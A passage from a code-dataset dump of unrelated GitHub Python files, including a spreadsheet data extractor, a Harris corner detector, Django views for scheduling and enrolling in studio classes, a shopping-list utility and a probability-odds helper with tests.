plt.pause(20)\n","repo_name":"songyongkang/RobotLearning","sub_path":"Exercise2/python/proMP.py","file_name":"proMP.py","file_ext":"py","file_size_in_byte":2822,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"2087641017","text":"\"\"\"\nScript to extract resident move-in dates from raw data file.\n\"\"\"\n\nimport re\n\nimport pandas as pd\n\ndef reset_extracted_row():\n return {\n 'Unit': '',\n 'Name': '',\n 'Move_in_Date': '',\n 'Total': 0\n }\n\n\ndef main():\n waitlist_file = 'Parking_Waitlist_20191011_Cleaned.xlsx'\n\n move_in_file = 'Woodcliff_Move_In_Move_Out_Data_06122020.xlsx'\n sheets = pd.read_excel(move_in_file, sheet_name=None)\n extracted_data = []\n for name, sheet in sheets.items():\n print(f\"Processing sheet: {name}\")\n df = sheet\n df1 = df[['Unit', 'Resident', 'Move In', 'Unnamed: 9', 'Unnamed: 10']] # select only columns of interest\n df1 = df1.drop(df.index[0]) # drop second header row\n extracted_row = reset_extracted_row()\n for index, row in df1.iterrows():\n if re.match(r'.*Blvd.*', str(row.Unit), re.I|re.M):\n # print(row.Unit)\n extracted_row['Unit'] = '-'.join(re.search(r'(\\d+).?Blvd.*?#(.*?)$', row.Unit).groups())\n if not pd.isna(row.Resident):\n extracted_row['Name'] = row.Resident\n if not pd.isna(row['Move In']):\n extracted_row['Move_in_Date'] = row['Move In']\n if row['Unnamed: 9'] == 'Total':\n extracted_row['Total'] = row['Unnamed: 10']\n extracted_data.append(extracted_row)\n extracted_row = reset_extracted_row()\n\n df_extracted = pd.DataFrame(extracted_data)\n move_in_file_processed = move_in_file.split('.')\n move_in_file_processed.insert(1, '_processed')\n move_in_file_processed.insert(2, '.')\n df_extracted.to_excel(''.join(move_in_file_processed), index=False)\n print(\"Program completed.\")\n\n\nif __name__ == '__main__':\n main()\n\n","repo_name":"plartoo/others","sub_path":"random_stuff/woodcliff/extract_resident_move_in.py","file_name":"extract_resident_move_in.py","file_ext":"py","file_size_in_byte":1780,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"6252756239","text":"from skimage import io\nimport numpy as np\nfrom scipy.ndimage import gaussian_filter\nfrom scipy.signal import convolve2d\nfrom matplotlib import pyplot as plt\n\nimg = io.imread('PCB.jpg', as_gray = True)\nimg1 = io.imread('PCB.jpg') # placeholder to indicate the corners later\n\nsmoothened_img = gaussian_filter(img, 1)\n\n# gradient along x-axis\nsobel_x = np.array([[-1, 0, 1],\n [-2, 0, 2],\n [-1, 0, 1]])\n\n# gradient along y-axis\nsobel_y = np.array([[-1, -2, -1],\n [0, 0 ,0],\n [1, 2, 1]])\n\n# Forming the structure tensor for the input image\ngrad_x = convolve2d(smoothened_img, sobel_x, mode = 'same', boundary = 'symm')\ngrad_y = convolve2d(smoothened_img, sobel_y, mode = 'same', boundary = 'symm')\ngrad_x_square = grad_x * grad_x\ngrad_y_square = grad_y * grad_y\ngrad_x_y = grad_x * grad_y\n\nsmoothened_grad_x_square = gaussian_filter(grad_x_square, 1)\nsmoothened_grad_y_square = gaussian_filter(grad_y_square, 1)\nsmoothened_grad_x_y = gaussian_filter(grad_x_y, 1)\n\nad = smoothened_grad_x_square * smoothened_grad_y_square\nbc = smoothened_grad_x_y * smoothened_grad_x_y\ntrace_matrix = smoothened_grad_x_square + smoothened_grad_y_square\ntrace_matrix_square = trace_matrix * trace_matrix\ndet_J = ad-bc\n\n# Computing the response by: det(J) - k Trace(M)^2, where k is an empirically chosen value\nk = 0.05\ncorner_matrix = (-k * trace_matrix_square) + det_J\n\n# Indicate corner pixels in red\nimg1[corner_matrix > k] = [255, 0, 0] \n\nfig, (ax1, ax2) = plt.subplots(1, 2)\nax1.imshow(img, cmap = 'gray')\nax1.set_title(\"Input Image\")\nax2.imshow(img1)\nax2.set_title(\"Result\")","repo_name":"madhoolikab/harris-corner-detector","sub_path":"harris_corner_detector.py","file_name":"harris_corner_detector.py","file_ext":"py","file_size_in_byte":1632,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"70012269346","text":"class Solution:\n def lengthOfLongestSubstring(self, s: str) -> int:\n dic = {}\n maxi = c = 0\n for i in range(len(s)):\n if s[i] in dic:\n c = min(c+1,i-dic[s[i]])\n else: c += 1\n maxi = max(maxi,c)\n dic[s[i]] = i\n return maxi","repo_name":"dhananjaysahu79/DSA-problems","sub_path":"Leetcode Problems/longest-substring-without-repeating-characters.py","file_name":"longest-substring-without-repeating-characters.py","file_ext":"py","file_size_in_byte":311,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"70"}
+{"seq_id":"40527603749","text":"from asyncore import write\nimport re\nimport os\n\n\nclass ShoppingItem:\n def __init__(self, name, price, qty, store):\n self.name = name\n self.price = price\n self.qty = qty\n self.store = store\n\n def toString(self):\n return \"{} - {} - {}({})\".format(self.name, self.price, self.store, self.qty)\n\n\ndef GetListFromUser():\n userInput = \"\"\n shoppingList = []\n\n while userInput != \"stop\":\n userInput = input(\"Name: \")\n if userInput == \"stop\":\n break\n name = userInput\n userInput = input(\"Price: \")\n if userInput == 0:\n continue\n price = userInput\n userInput = input(\"Qty: \")\n if userInput == 0:\n continue\n qty = userInput\n userInput = input(\"Store: \")\n store = userInput\n newEntry = ShoppingItem(name, price, qty, store)\n shoppingList.append(newEntry)\n return shoppingList\n\n\ndef ReadFromFile(filename):\n shoppingList = []\n f = open(str(filename), \"rt\")\n try:\n with open(str(filename), \"rt\") as file:\n for line in f:\n line = line.rstrip(\"\\n\")\n firstParse = line.split(\" - \")\n secondParse = re.split(r\"\\(|\\)\", firstParse[2])\n name = firstParse[0]\n price = firstParse[1]\n qty = secondParse[1]\n store = secondParse[0]\n newEntry = ShoppingItem(name, price, qty, store)\n shoppingList.append(newEntry)\n f.close()\n except IOError:\n print(\"ERROR OPENING FILE\")\n return shoppingList\n\n\ndef IsUserSaving():\n userInput = input(\"Do you wish to save (yes/no)?\")\n if userInput == \"yes\":\n return True\n return False\n\n\ndef IsUserPostingToHabitica():\n userInput = input(\"Do you wish to send list to Habitica (yes/no)?\")\n if userInput == \"yes\":\n return True\n return False\n\n\ndef ConvertShoppingListToStringArray(shoppingList):\n resultArray = []\n for item in shoppingList:\n resultArray.append(item.toString())\n return resultArray\n\n\ndef PrintToFile(filename, shoppingList):\n if os.path.exists(filename):\n os.remove(filename)\n try:\n shoppingListStrings = ConvertShoppingListToStringArray(shoppingList)\n # open(filename, \"wt\")\n with open(filename, \"wt\") as file:\n writeString = \"\\n\".join(shoppingListStrings)\n file.write(writeString)\n file.close()\n except IOError:\n print(\"ERROR OPENING FILE\")\n","repo_name":"catalinp86/shopping-list-generator","sub_path":"PythonPOC/core.py","file_name":"core.py","file_ext":"py","file_size_in_byte":2546,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"38473135155","text":"from django.shortcuts import get_object_or_404\nfrom django.views.decorators.csrf import csrf_exempt\nfrom django.http import HttpResponse, HttpResponseRedirect, JsonResponse\nfrom .models import Class, Classes, Keyword\nfrom studios.models import Studio\nimport stripe\nimport time\n\nfrom accounts.models import Users as User\nimport json\nfrom datetime import datetime\nimport datetime\nfrom rest_framework.decorators import api_view\nfrom subscriptions.models import StripeUser, StripeUserLog\n\nWEEK_DAY_CODE = {'monday': 0, 'tuesday': 1, 'wednesday': 2,\n 'thursday': 3, 'friday': 4, 'saturday': 5, 'sunday': 6}\n\n\n@api_view(['POST'])\n@csrf_exempt\ndef CreateClasses(request, id):\n if request.method == \"POST\":\n if not request.user.is_superuser:\n return HttpResponse(\"Not Admin\", status=403)\n studio_id = id\n studio = Studio.objects.get(id=studio_id)\n if studio is None:\n return HttpResponse(\"No studio found\", status=404)\n classes_info = json.loads(request.body)\n name = classes_info.get('name')\n if Classes.objects.filter(name=name).exists():\n return HttpResponse(\"This class name already exists\")\n\n description = classes_info.get('description')\n coach = classes_info.get('coach')\n capacity = int(classes_info.get('capacity'))\n keywords = classes_info.get('keywords')\n weekday = classes_info.get('weekday')\n start_time = classes_info.get('start_time')\n end_time = classes_info.get('end_time')\n end_date = classes_info.get('end_date')\n\n new_classes = Classes(name=name, description=description,\n coach=coach, capacity=capacity, weekday=weekday, studio=studio)\n new_classes.save()\n\n for keyword in keywords:\n try:\n keyword_instance = Keyword.objects.get(keyword=keyword)\n except Keyword.DoesNotExist:\n keyword_instance = None\n\n if keyword_instance:\n new_classes.keywords.add(keyword_instance.id)\n else:\n new_keyword = Keyword(keyword=keyword)\n new_keyword.save()\n new_classes.keywords.add(new_keyword)\n\n today = datetime.date.today()\n week_day_code = WEEK_DAY_CODE[weekday]\n class_date = today + \\\n datetime.timedelta(days=-today.weekday() + week_day_code, weeks=1)\n class_end = datetime.date(\n end_date[\"year\"], end_date[\"month\"], end_date[\"day\"])\n class_start_time = datetime.time(\n start_time['hour'], start_time['minute'])\n class_end_time = datetime.time(end_time['hour'], end_time['minute'])\n new_classes.start_time = class_start_time\n new_classes.end_time = class_end_time\n new_classes.end_date = class_end\n new_classes.save()\n\n while class_date < class_end:\n new_class = Class(name=name, start_time=class_start_time, end_time=class_end_time, date=class_date,\n studio=studio, classes=new_classes, coach=coach)\n new_class.save()\n # new_classes.class_lst.add(new_class)\n class_date = class_date + datetime.timedelta(days=7)\n\n new_classes.save()\n\n return HttpResponse(\"Class Created Successfully\")\n\n\n@api_view(['POST'])\n@csrf_exempt\ndef EditClasses(request, id):\n if request.method == \"POST\":\n if not request.user.is_superuser:\n return HttpResponse(\"Not Admin\", status=403)\n studio_id = id\n studio = Studio.objects.get(id=studio_id)\n if studio is None:\n return HttpResponse(\"No studio found\", status=404)\n classes_info = json.loads(request.body)\n name = classes_info.get('name')\n altername = classes_info.get(\"altername\")\n description = classes_info.get('description')\n coach = classes_info.get('coach')\n capacity = classes_info.get('capacity')\n start_raw = classes_info.get(\"start_time\")\n end_raw = 
classes_info.get(\"end_time\")\n date_raw = classes_info.get(\"date\")\n\n classes = Classes.objects.get(studio=studio, name=name)\n class_lst = Class.objects.filter(studio=studio, name=name)\n\n if description is not None:\n classes.description = description\n\n if coach is not None:\n classes.coach = coach\n for class_inst in class_lst:\n class_inst.coach = coach\n\n if capacity is not None:\n classes.capacity = int(capacity)\n\n if altername is not None:\n classes.name = altername\n for class_inst in class_lst:\n class_inst.name = altername\n class_inst.save()\n\n if start_raw is not None:\n start = datetime.time(start_raw[\"hour\"], start_raw[\"minute\"])\n for class_inst in class_lst:\n class_inst.start_time = start\n class_inst.save()\n\n if end_raw is not None:\n end = datetime.time(end_raw[\"hour\"], end_raw[\"minute\"])\n for class_inst in class_lst:\n class_inst.end_time = end\n class_inst.save()\n\n if date_raw is not None:\n date = datetime.date(\n date_raw[\"year\"], date_raw[\"month\"], date_raw[\"day\"])\n class_lst.filter(date__gt=date).delete()\n\n classes.save()\n\n return HttpResponse(\"Edit Class Successfully!\")\n\n\n@api_view([\"POST\"])\n@csrf_exempt\ndef RemoveClass(request):\n if request.method == \"POST\":\n if not request.user.is_superuser:\n return HttpResponse(\"Not Admin\", status=403)\n class_info = json.loads(request.body).get('body')\n print(class_info)\n name = class_info.get('classname')\n date_raw = class_info.get('date')\n print(\"date raw\", date_raw)\n date = datetime.date(\n date_raw[\"year\"], date_raw[\"month\"], date_raw[\"day\"])\n if not Class.objects.filter(name=name, date=date).exists():\n return HttpResponse(\"This time slot or class name does not exist!\")\n class_to_remove = Class.objects.filter(name=name, date=date)\n class_to_remove.delete()\n return HttpResponse(\"Class Cancelled Successfully!\")\n\n\n@api_view([\"POST\"])\n@csrf_exempt\ndef RemoveClasses(request):\n if request.method == \"POST\":\n if not request.user.is_superuser:\n return HttpResponse(\"Not Admin\", status=403)\n class_info = json.loads(request.body).get('body')\n name = class_info.get('name')\n if not Classes.objects.filter(name=name).exists():\n return HttpResponse(\"No such class exists!\")\n class_to_remove = Classes.objects.filter(name=name)\n class_to_remove.delete()\n return HttpResponse(\"Classes Cancelled Successfully!\")\n\n\n@api_view([\"GET\"])\n@csrf_exempt\ndef ListClasses(request, id):\n if request.method == \"GET\":\n studio = Studio.objects.get(id=id)\n if studio is None:\n return HttpResponse(\"No studio found\", status=404)\n now = datetime.datetime.now()\n order_class = Class.objects.filter(\n studio=studio).order_by('date', 'start_time')\n data = []\n for class_inst in order_class:\n print(class_inst.date, now.date(),\n class_inst.start_time, now.time())\n if class_inst.date > now.date():\n print(\"here\")\n class_info = {\"name\": class_inst.name, \"start_time\": class_inst.start_time,\n \"end_time\": class_inst.end_time, \"date\": class_inst.date}\n data.append(class_info)\n\n return JsonResponse(data, safe=False)\n\n\n@api_view([\"POST\"])\n@csrf_exempt\ndef EnrollClasses(request, id):\n if request.method == \"POST\":\n if not request.user.is_authenticated:\n print(\"Did not login\")\n return HttpResponse(\"Login in first to enroll a class!\", status=403)\n studio = Studio.objects.get(id=id)\n if studio is None:\n print(\"no such studio\")\n return HttpResponse(\"No studio found\", status=404)\n data = json.loads(request.body).get(\"data\")\n 
classes = Classes.objects.get(\n studio=studio, name=data.get(\"classname\"))\n if classes.capacity == 0:\n return HttpResponse(\"Enrolling failed! The class is full!\")\n else:\n user = request.user\n\n # user_logs = StripeUserLog.objects.all().filter(user_id=request.user.id)\n\n # stripe_customer_ids = []\n\n # for log in user_logs:\n # stripe_customer_ids.append(log.stripe_customer_id)\n\n # stripe_user = StripeUser.objects.all().filter(\n # user_id=user.id)\n\n # is_active = False\n\n # if len(stripe_user) != 0:\n # is_active = True\n # if not is_active:\n # return HttpResponse(\"Need subscribe first to enroll the class!\", status=403)\n\n # See if user has an unsubscribed subscription that is still valid\n\n user_logs = StripeUserLog.objects.all().filter(user_id=request.user.id)\n\n stripe_customer_ids = []\n\n for log in user_logs:\n stripe_customer_ids.append(log.stripe_customer_id)\n\n has_subscription = False\n\n for customer_id in stripe_customer_ids:\n invoices = stripe.Invoice.list(customer=customer_id).data\n for invoice in invoices:\n if invoice.lines.data[0].period.end >= time.time():\n has_subscription = True\n\n if not has_subscription:\n return HttpResponse(\"Need subscribe first to enroll the class!\", status=403)\n\n else:\n print(\"enroll here\")\n new_cap = classes.capacity - 1\n classes.capacity = new_cap\n user.classes.add(classes)\n class_lst = Class.objects.filter(classes=classes)\n stripe_user = StripeUser.objects.all().filter(\n user_id=user.id)\n user_logs = StripeUserLog.objects.all().filter(user_id=user.id)\n stripe_customer_ids = []\n\n for log in user_logs:\n stripe_customer_ids.append(log.stripe_customer_id)\n\n end_period = None\n\n for customer_id in stripe_customer_ids:\n invoices = stripe.Invoice.list(customer=customer_id).data\n for invoice in invoices:\n if invoice.lines.data[0].period.end >= time.time():\n timestamp = invoice.lines.data[0].period.end\n end_period = datetime.datetime.fromtimestamp(\n timestamp).date()\n\n for class_inst in class_lst:\n if class_inst.date < end_period:\n user.class_lst.add(class_inst.id)\n user.save()\n print(user.class_lst)\n print(user.classes)\n return HttpResponse(\"Enroll in class successfully!\")\n\n\n@api_view([\"POST\"])\n@csrf_exempt\ndef DeleteClasses(request):\n if request.method == \"POST\":\n # user = User.objects.get(username=info.get(\"username\"))\n user = request.user\n if not user.is_authenticated:\n return HttpResponse(\"Login in first to quit a class!\", status=403)\n info = json.loads(request.body)\n if user is None:\n return HttpResponse(\"No such user!\", status=404)\n user_classes_lst = user.classes\n user_class_lst = user.class_lst\n classes = Classes.objects.get(name=info.get(\"classname\"))\n user_classes_lst.remove(classes)\n class_lst = Class.objects.filter(name=info.get(\"classname\"))\n for class_inst in class_lst:\n user_class_lst.remove(class_inst)\n\n new_cap = classes.capacity + 1\n classes.capacity = new_cap\n return HttpResponse(\"Class dropped successfully!\")\n\n\n@api_view([\"POST\"])\n@csrf_exempt\ndef DeleteClass(request):\n if request.method == \"POST\":\n user = request.user\n if not user.is_authenticated:\n return HttpResponse(\"Login in first to delete a class!\", status=403)\n info = json.loads(request.body)\n if user is None:\n return HttpResponse(\"No such user!\", status=404)\n user_class_lst = user.class_lst\n date_raw = info.get(\"date\")\n year = date_raw[\"year\"]\n month = date_raw[\"month\"]\n day = date_raw[\"day\"]\n class_date = datetime.date(year, month, 
day)\n class_to_delete = Class.objects.get(\n name=info.get(\"classname\"), date=class_date)\n if class_to_delete is None:\n return HttpResponse(\"No class session found!\")\n user_class_lst.remove(class_to_delete)\n return HttpResponse(\"Class session delete successfully!\")\n\n\n@api_view([\"GET\"])\n@csrf_exempt\ndef UserSchedule(request):\n if request.method == \"GET\":\n if not request.user.is_authenticated:\n return HttpResponse(\"Login in first to view schedule!\", status=403)\n # info = json.loads(request.body)\n # user = User.objects.get(username=info.get(\"username\"))\n user = request.user\n now = datetime.datetime.now()\n print(request.user)\n order_class = user.class_lst.order_by('date', 'start_time')\n data = []\n for class_inst in order_class:\n if class_inst.date > now.date():\n class_info = {\"name\": class_inst.name, \"start_time\": class_inst.start_time,\n \"end_time\": class_inst.end_time, \"date\": class_inst.date}\n data.append(class_info)\n\n return JsonResponse(data, safe=False)\n\n\n@api_view([\"GET\"])\n@csrf_exempt\ndef SearchClass(request, id):\n if request.method == \"GET\":\n studio = Studio.objects.get(id=id)\n if studio is None:\n return HttpResponse(\"No studio found\", status=404)\n search_key = json.loads(request.body)\n coach = search_key.get(\"coach\")\n class_name = search_key.get(\"classname\")\n\n class_lst = Class.objects.filter(studio=studio)\n if coach is not None:\n class_lst = class_lst.filter(coach=coach)\n\n if class_name is not None:\n class_lst = class_lst.filter(name=class_name)\n\n date_raw = search_key.get(\"date\")\n if date_raw is not None:\n date = datetime.date(\n date_raw[\"year\"], date_raw[\"month\"], date_raw[\"day\"])\n class_lst = class_lst.filter(date=date)\n\n data = []\n\n start_raw = search_key.get(\"start\")\n end_raw = search_key.get(\"end\")\n if start_raw is not None and end_raw is not None:\n start = datetime.time(start_raw[\"hour\"], start_raw[\"minute\"])\n end = datetime.time(end_raw[\"hour\"], end_raw[\"minute\"])\n for class_inst in class_lst:\n if class_inst.start_time > start and class_inst.end_time < end:\n class_info = {\"name\": class_inst.name, \"start_time\": class_inst.start_time,\n \"end_time\": class_inst.end_time, \"date\": class_inst.date}\n data.append(class_info)\n\n if start_raw is not None and end_raw is None:\n start = datetime.time(start_raw[\"hour\"], start_raw[\"minute\"])\n for class_inst in class_lst:\n if class_inst.start_time > start:\n class_info = {\"name\": class_inst.name, \"start_time\": class_inst.start_time,\n \"end_time\": class_inst.end_time, \"date\": class_inst.date}\n data.append(class_info)\n\n if start_raw is None and end_raw is not None:\n end = datetime.time(end_raw[\"hour\"], end_raw[\"minute\"])\n for class_inst in class_lst:\n if class_inst.end_time < end:\n class_info = {\"name\": class_inst.name, \"start_time\": class_inst.start_time,\n \"end_time\": class_inst.end_time, \"date\": class_inst.date}\n data.append(class_info)\n\n if start_raw is None and end_raw is None:\n for class_inst in class_lst:\n class_info = {\"name\": class_inst.name, \"start_time\": class_inst.start_time,\n \"end_time\": class_inst.end_time, \"date\": class_inst.date}\n data.append(class_info)\n\n return JsonResponse(data, safe=False)\n\n\n@api_view([\"POST\"])\n@csrf_exempt\ndef SearchClasses(request, id):\n if request.method == \"POST\":\n studio = Studio.objects.get(id=id)\n if studio is None:\n return HttpResponse(\"No studio found\", status=404)\n search_key = 
json.loads(request.body).get(\"body\")\n print(search_key)\n coach = search_key.get(\"coach\")\n class_name = search_key.get(\"classname\")\n class_lst = Class.objects.filter(studio=studio)\n if coach is not None and coach != '':\n class_lst = class_lst.filter(coach=coach)\n\n if class_name is not None and class_name != \"\":\n class_lst = class_lst.filter(name=class_name)\n\n date_raw = search_key.get(\"date\")\n if date_raw is not None:\n if date_raw[\"year\"] is not None:\n date = datetime.date(\n date_raw[\"year\"], date_raw[\"month\"], date_raw[\"day\"])\n class_lst = class_lst.filter(date=date)\n\n data = []\n\n start_raw = search_key.get(\"start_time\")\n end_raw = search_key.get(\"end_time\")\n if start_raw is not None and end_raw is not None:\n if start_raw[\"hour\"] is not None and end_raw[\"hour\"] is not None:\n print(\"start end here\")\n start = datetime.time(start_raw[\"hour\"], start_raw[\"minute\"])\n end = datetime.time(end_raw[\"hour\"], end_raw[\"minute\"])\n for class_inst in class_lst:\n if class_inst.start_time > start and class_inst.end_time < end:\n class_info = {\"name\": class_inst.name, \"start_time\": class_inst.start_time,\n \"end_time\": class_inst.end_time, \"date\": class_inst.date}\n data.append(class_info)\n\n if start_raw is not None and end_raw is None:\n if start_raw[\"hour\"] is not None:\n print(\"start here\")\n start = datetime.time(start_raw[\"hour\"], start_raw[\"minute\"])\n for class_inst in class_lst:\n if class_inst.start_time > start:\n class_info = {\"name\": class_inst.name, \"start_time\": class_inst.start_time,\n \"end_time\": class_inst.end_time, \"date\": class_inst.date}\n data.append(class_info)\n\n if start_raw is None and end_raw is not None:\n if end_raw[\"hour\"] is not None:\n print(\"end here\")\n end = datetime.time(end_raw[\"hour\"], end_raw[\"minute\"])\n for class_inst in class_lst:\n if class_inst.end_time < end:\n class_info = {\"name\": class_inst.name, \"start_time\": class_inst.start_time,\n \"end_time\": class_inst.end_time, \"date\": class_inst.date}\n data.append(class_info)\n\n if start_raw is None and end_raw is None:\n print(\"none here\")\n for class_inst in class_lst:\n class_info = {\"name\": class_inst.name, \"start_time\": class_inst.start_time,\n \"end_time\": class_inst.end_time, \"date\": class_inst.date}\n data.append(class_info)\n\n if data is None:\n return JsonResponse(data, safe=False)\n else:\n classes = dict()\n for class_inst in data:\n classes[class_inst[\"name\"]] = {\"start_time\": class_inst[\"start_time\"],\n \"end_time\": class_inst[\"end_time\"]}\n\n classes_data = []\n for key in classes.keys():\n curr = Classes.objects.get(name=key)\n\n keyword_lst = []\n for keyword in curr.keywords.all():\n keyword_lst.append(keyword.keyword)\n classes_info = {\"classname\": key, \"description\": curr.description, \"coach\": curr.coach,\n \"weekday\": curr.weekday, \"keywords\": keyword_lst,\n \"start\": classes.get(key)[\"start_time\"], \"end\": classes.get(key)[\"end_time\"]}\n classes_data.append(classes_info)\n\n return JsonResponse(classes_data, safe=False)\n","repo_name":"michael-j-rubenstein/CSC309-Backend","sub_path":"classes/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":20805,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"29751173231","text":"import numpy # used only for testing\n\n\ndef change_probability_by_a_percentage(probability, percentage):\n assert -100 < percentage\n odds = convert_probability_to_odds(probability)\n newOdds = increase_odds_by_a_percentage(odds, percentage)\n newProbability = convert_odds_to_probabilitiy(newOdds)\n return newProbability\n \n\n#helper function\ndef convert_probability_to_odds(probability):\n '''returns the odds in proportion to one. \n i.e. X to Y, where Y = 1, this function returns X\n ex: probability=.8, odds = 4:1 --> returns 4.0\n if probability = 1, returns float('Inf')'''\n assert 0 <= probability <= 1, \"Probability must be between 0 and 1, inclusive\"\n try:\n return probability/(1.-probability)\n except ZeroDivisionError:\n return float('Inf')\n \n#helper function\ndef increase_odds_by_a_percentage(odds, percentage):\n percentAsDecimal = percentage/100.\n\n return odds * (1.+percentAsDecimal)\n \n#helper function\ndef convert_odds_to_probabilitiy(odds):\n if odds == float('Inf'):\n return 1.0\n return odds/(1.+odds)\n \n\ndef test_change_probability_by_a_percentage():\n methodToTest = change_probability_by_a_percentage\n # increase probability\n assert methodToTest(.5, 0) == .5\n assert methodToTest(.6, 100) == .75\n assert methodToTest(.1, 3000) == .775 \n assert methodToTest(1, 3000) == 1.0 \n assert methodToTest(1, 0) == 1.0\n assert methodToTest(1., 7) == 1.0 \n\n # decrease probability\n assert methodToTest(.5, -75) == .2\n assert methodToTest(.75, -50) == .6\n assert methodToTest(.1, -40) == .0625\n assert methodToTest(1, -10) == 1.0\n assert methodToTest(1., -7) == 1.0\n \n # compare to bayes_approach_change_probability_by_a_percentage\n tolerance = .000000001\n methodToTestAgainst = bayes_approach_change_probability_by_a_percentage\n for prob in numpy.arange(0.1, 1.1, .1):\n for perc in numpy.arange(-99.9,200,.1):\n assert abs(methodToTest(prob, perc) - methodToTestAgainst(prob, perc)) < tolerance\n \n\ndef bayes_approach_change_probability_by_a_percentage(probability, percentage):\n return probability/(probability+(((percentage/100.)+1)**-1)*(1-probability))\n\ntest_change_probability_by_a_percentage()\n\n\n","repo_name":"CodeProgress/Useful_Methods","sub_path":"ChangeProbabilityByAPercentage.py","file_name":"ChangeProbabilityByAPercentage.py","file_ext":"py","file_size_in_byte":2267,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"70"}
+{"seq_id":"15925022463","text":"from rest_framework.response import Response\nfrom rest_framework.views import APIView\nfrom Backend.models import VisitationLog, Item\nfrom ...serializers import *\nfrom rest_framework_simplejwt.authentication import JWTAuthentication\nfrom rest_framework.permissions import IsAuthenticated\nfrom rest_framework import status\n\n\nclass VisitationLogList(APIView):\n\n serializer_class = VisitationLogSerializer\n \n authentication_classes = [JWTAuthentication]\n permission_classes = [IsAuthenticated]\n\n def post(self, request, format=None):\n\n log_serializer = VisitationLogSerializer(data=request.data)\n\n if log_serializer.is_valid():\n\n seller_id = Item.objects.get(id=log_serializer.data['item_id']).seller_user_id\n\n if not seller_id == log_serializer.data['user_id']:\n try:\n log = VisitationLog.objects.get(user_id_id=log_serializer.data['user_id'], item_id_id=log_serializer.data['item_id'])\n log.count += 1\n log.save()\n return Response(status=status.HTTP_201_CREATED)\n\n except VisitationLog.DoesNotExist:\n VisitationLog.objects.create(user_id_id=log_serializer.data['user_id'], item_id_id=log_serializer.data['item_id'], recommendation=log_serializer.data['recommendation'], count=1)\n return Response(status=status.HTTP_201_CREATED)\n\n return Response(status=status.HTTP_400_BAD_REQUEST)\n\n\nclass AcquireRecommendations(APIView):\n\n authentication_classes = [JWTAuthentication]\n permission_classes = [IsAuthenticated]\n\n def get(self, request, format=None):\n\n try:\n top_recommendations = VisitationLog.objects.filter(user_id=request.user.id, count__lte=1).order_by(\"-recommendation\").values()\n \n item_ids = []\n for rec in top_recommendations:\n item_ids.append(rec[\"item_id_id\"])\n \n filtered_items = Item.objects.filter(id__in=item_ids).exclude(seller_user_id=request.user.id)\n\n recommendedItems = []\n rec_counter = 0\n\n for item_id in item_ids:\n if not Item.objects.filter(id=item_id, seller_user_id=request.user.id).exists():\n recommendedItems.append(filtered_items.get(id=item_id))\n rec_counter += 1\n if rec_counter == 6:\n break\n\n serializer = ItemSerializer(recommendedItems, many=True)\n return Response(serializer.data, status=status.HTTP_200_OK)\n \n except Exception:\n return Response(status=status.HTTP_500_INTERNAL_SERVER_ERROR)\n","repo_name":"Aggelos561/Bidding-Website","sub_path":"Backend/RestFramework/VisitationLogs/visitationLog.py","file_name":"visitationLog.py","file_ext":"py","file_size_in_byte":2689,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"70"}
+{"seq_id":"30933280354","text":"\n# from openpyxl import Workbook\nfrom openpyxl import load_workbook\nimport tkinter\n\nclass ListItem:\n def __init__(self, code, name):\n self.code = code\n self.name = name\n\n\nclass Entry:\n def __init__(self, row):\n self.deptCode = row[0].value\n self.deptName = row[1].value\n self.nominalCode = row[2].value\n self.nominalName = row[3].value\n self.date = row[4].value\n self.narrative = row[5].value\n self.blank = row[6].value\n self.transValue = row[7].value\n self.cat = row[8].value\n\n\ndef printSheetTitles(wb):\n for sheet in wb:\n print(sheet.title)\n\n\ndef getRow(ws, rowno):\n newRow = ws[rowno]\n # for item in newRow:\n # print(item.value)\n # print(newRow)\n return newRow\n\n\ndef printvalues(ws):\n for row in ws.values:\n for value in row:\n print(value)\n\n\ndef categorise(ws):\n for i in range(1, ws.max_row):\n cell = ws.cell(i, 3)\n if (cell.value == 7003) or (cell.value == 7006) or (cell.value == 7007):\n ws.cell(i, 9, 'Staff Costs')\n if cell.value == 5032:\n ws.cell(i, 9, 'Equipment')\n if (cell.value == 7307) or (cell.value == 7311) or (cell.value == 7312):\n ws.cell(i, 9, 'Travel')\n\n\ndef searchByNominal(entryList, nominalCode):\n filteredList = []\n for item in entryList:\n if item.nominalCode == nominalCode:\n filteredList.append(item)\n return filteredList\n\n\ndef save(wb, name):\n wb.save(name)\n\n\ndef printrows(ws):\n for row in ws.iter_rows(min_row=1, max_col=ws.max_column, max_row=ws.max_row, values_only=True):\n print(row)\n\n\ndef sumcat(ws, cat):\n catsum = 0\n for i in range(1, ws.max_row):\n cell = ws.cell(i, 9)\n if cell.value == cat:\n cell = ws.cell(i, 8)\n catsum = catsum + cell.value\n string = (cat + ' Total : ' + str(catsum))\n return string\n\n\n\ndef getNominalList(ws):\n nominalList = []\n initCode = ws.cell(1, 3).value\n initName = ws.cell(1, 4).value\n\n for i in range (2, ws.max_row):\n nominalCode = ws.cell(i, 3).value\n nominalName = ws.cell(i, 4).value\n\n\ndef sumdept(ws, dept):\n deptsum = 0\n for i in range(1, ws.max_row):\n cell = ws.cell(i, 1)\n if cell.value == dept:\n cell = ws.cell(i, 8)\n name = ws.cell(i, 2).value\n deptsum += cell.value\n string = (name + ' Total : ' + str(deptsum))\n return string\n\n\ndef getList(ws, codeCol, nameCol):\n list = []\n initCode = ws.cell(1, codeCol).value\n initName = ws.cell(1, nameCol).value\n list.append(ListItem(initCode, initName))\n for i in range(2, ws.max_row):\n itemCode = ws.cell(i, codeCol).value\n itemName = ws.cell(i, nameCol).value\n # newDept = Department(deptCode, deptName)\n # deptList.append(newDept)\n for item in list:\n found = False\n if item.code == itemCode:\n found = True\n if found == False:\n newItem = ListItem(itemCode, itemName)\n list.append(newItem)\n return list\n\n\ndef printList(list):\n print(\"No. 
